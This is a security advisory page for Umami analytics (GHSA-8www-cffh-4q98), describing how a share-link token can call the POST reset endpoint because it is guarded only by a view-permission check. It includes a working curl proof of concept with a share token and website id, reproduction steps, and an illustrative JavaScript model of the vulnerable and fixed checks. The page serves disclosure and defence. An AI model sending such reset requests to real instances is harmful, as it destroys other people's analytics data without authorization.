Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS04d3d3LWNmZmgtNHE5OM4AA08I
Anyone with a share link can RESET all website data in Umami
Summary
Anyone with a share link (permissions to view) can reset the website data.
Details
When a user navigates to a /share/ URL, they receive a share token which is used for authentication. This token is later verified by useAuth. After the token is verified, the user can call most of the GET APIs that allow fetching stats about a website.
The POST /reset endpoint is secured using canViewWebsite, which is the incorrect verification for such a destructive action. This makes it possible to completely reset all website data with ONLY view permissions.
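The authorization gap described above, as an added JavaScript illustration that is not Umami's own code: a share token grants view rights to one website, so a reset handler gated on canViewWebsite (the check named in the advisory) accepts a share-token-only request, while the same handler gated on a stricter update check rejects it. canUpdateWebsite, authFromHeaders, makeStore, the token strings and the website id are assumed names and constructed sample data, not values from the project.

```javascript
// Added example, not Umami's code. Models the flaw in the advisory: a share
// token is a website-scoped, read-only principal, and a destructive endpoint
// that checks only canViewWebsite lets that principal trigger a reset.
// Everything except the name canViewWebsite is assumed for illustration.

// Constructed sample data: one website, one share token scoped to it, one owner.
const WEBSITE_ID = '00000000-0000-4000-8000-000000000001'; // placeholder id
const SHARE_TOKENS = new Map([
  ['share-token-abc', { websiteId: WEBSITE_ID }], // constructed
]);
const USERS = new Map([
  ['user-token-xyz', { id: 'owner-1', websites: [WEBSITE_ID] }], // constructed
]);

// Fresh in-memory stats store for each scenario.
function makeStore() {
  return new Map([[WEBSITE_ID, { pageviews: 1234, sessions: 321 }]]);
}

// Build the principal a request carries (assumed shape). As the advisory
// describes: a verified x-umami-share-token yields a website-scoped read-only
// principal; an authorization Bearer token yields a logged-in user.
function authFromHeaders(headers) {
  const share = SHARE_TOKENS.get(headers['x-umami-share-token']);
  if (share) return { shareToken: share };
  const bearer = (headers['authorization'] || '').replace(/^Bearer\s+/i, '');
  const user = USERS.get(bearer);
  if (user) return { user };
  return {}; // anonymous
}

// View permission: members of the website, or share-token holders for it.
function canViewWebsite(auth, websiteId) {
  if (auth.user) return auth.user.websites.includes(websiteId);
  if (auth.shareToken) return auth.shareToken.websiteId === websiteId;
  return false;
}

// Assumed stricter check for state-changing requests: a share-token holder
// never qualifies; only a logged-in user with rights on that website does.
function canUpdateWebsite(auth, websiteId) {
  return Boolean(auth.user) && auth.user.websites.includes(websiteId);
}

// Vulnerable shape of POST /api/websites/{id}/reset (what the advisory
// describes for versions before 2.3.1): destruction gated on the view check.
function resetWebsiteVulnerable(headers, websiteId, store) {
  const auth = authFromHeaders(headers);
  if (!canViewWebsite(auth, websiteId)) return { status: 403 };
  store.set(websiteId, { pageviews: 0, sessions: 0 });
  return { status: 200 };
}

// Hardened shape: the same endpoint gated on the update check.
function resetWebsiteFixed(headers, websiteId, store) {
  const auth = authFromHeaders(headers);
  if (!canUpdateWebsite(auth, websiteId)) return { status: 403 };
  store.set(websiteId, { pageviews: 0, sessions: 0 });
  return { status: 200 };
}

// Exercise both handlers with a share-token-only request (headers mirror the
// advisory's PoC: a share token plus "Bearer undefined"), an owner, and an
// anonymous caller, and report the status codes and resulting pageview counts.
function demo() {
  const shareOnly = { 'x-umami-share-token': 'share-token-abc', authorization: 'Bearer undefined' };
  const owner = { authorization: 'Bearer user-token-xyz' };
  const anonymous = {};
  const s1 = makeStore(), s2 = makeStore(), s3 = makeStore(), s4 = makeStore();
  return {
    shareOnlyVulnerable: resetWebsiteVulnerable(shareOnly, WEBSITE_ID, s1).status,
    shareOnlyFixed: resetWebsiteFixed(shareOnly, WEBSITE_ID, s2).status,
    ownerFixed: resetWebsiteFixed(owner, WEBSITE_ID, s3).status,
    anonymousVulnerable: resetWebsiteVulnerable(anonymous, WEBSITE_ID, s4).status,
    pageviewsAfterVulnerable: s1.get(WEBSITE_ID).pageviews,
    pageviewsAfterFixed: s2.get(WEBSITE_ID).pageviews,
  };
}

console.log(demo());
```

The design point is that the share token is not the bug: it is verified correctly and legitimately grants read access. The bug is reusing a read check for a write, so the fix belongs in the handler's authorization predicate, and a review of every state-changing route against the permission it actually requires is the check a maintainer would want after applying it.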
PoC
curl -X POST 'https://analytics.umami.is/api/websites/b8250618-ccb5-47fb-8350-31c96169a198/reset' \
-H 'authority: analytics.umami.is' \
-H 'accept: application/json' \
-H 'accept-language: en-US,en;q=0.9' \
-H 'authorization: Bearer undefined' \
-H 'cache-control: no-cache' \
-H 'content-type: application/json' \
-H 'pragma: no-cache' \
-H 'referer: https://analytics.umami.is/share/bw6MFhkwpwEXFsbd/test' \
-H 'sec-ch-ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"' \
-H 'sec-ch-ua-mobile: ?0' \
-H 'sec-ch-ua-platform: "Linux"' \
-H 'sec-fetch-dest: empty' \
-H 'sec-fetch-mode: cors' \
-H 'sec-fetch-site: same-origin' \
-H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36' \
-H 'x-umami-share-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ3ZWJzaXRlSWQiOiJiODI1MDYxOC1jY2I1LTQ3ZmItODM1MC0zMWM5NjE2OWExOTgiLCJpYXQiOjE2OTAzNjkxOTl9.zTfwFrfggE5na7rOOgkUobEBm48AH_8WVyh2RgJGzcw' \
--compressed
You can reproduce this by:
- Accessing a website using its share link
- Copying the token received from GET /share/{website-id}
- Sending a POST request to https://analytics.umami.is/api/websites/b8250618-ccb5-47fb-8350-31c96169a198/reset with the x-umami-share-token: header equal to the token copied in the previous step
- The website data is now cleared
Impact
Everyone with an open share link exposed to the internet!
Permalink: https://github.com/advisories/GHSA-8www-cffh-4q98
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04d3d3LWNmZmgtNHE5OM4AA08I
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: over 1 year ago
Updated: over 1 year ago
CVSS Score: 9.6
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H
Identifiers: GHSA-8www-cffh-4q98
References:
- https://github.com/umami-software/umami/security/advisories/GHSA-8www-cffh-4q98
- https://github.com/umami-software/umami/commit/ec48a4e3250e9cefc481b339a90e6ceea6f1ec2b
- https://github.com/advisories/GHSA-8www-cffh-4q98
Blast Radius: 0.0
Affected Packages
npm:umami
Dependent packages: 1
Dependent repositories: 1
Downloads: 195 last month
Affected Version Ranges: < 2.3.1
Fixed in: 2.3.1
All affected versions: 0.0.0, 0.1.0
All unaffected versions: 2.10.0